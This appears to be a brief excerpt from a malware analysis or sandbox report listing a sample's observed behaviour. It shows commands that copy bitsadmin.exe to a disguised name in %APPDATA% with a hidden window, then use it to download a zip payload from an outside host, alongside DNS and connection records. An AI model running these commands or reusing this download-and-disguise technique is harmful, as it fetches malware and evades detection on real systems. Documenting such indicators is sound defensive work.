Technical Information
- '%APPDATA%\txuinc.exe' /transfer bzGZyy /download https://zoomovers.com/momo/01186030936.zip %APPDATA%\011860309362
- %APPDATA%\txuinc.exe
- 'zo###vers.com':443
- DNS ASK zo###vers.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\TxuInc.exe' (with hidden window)
- '%APPDATA%\txuinc.exe' /transfer bzGZyy /download https://zoomovers.com/momo/01186030936.zip %APPDATA%\011860309362' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\TxuInc.exe